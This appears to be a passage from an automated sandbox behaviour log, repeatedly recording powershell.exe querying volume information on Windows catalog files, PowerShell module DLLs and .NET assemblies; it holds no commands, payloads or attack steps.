Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
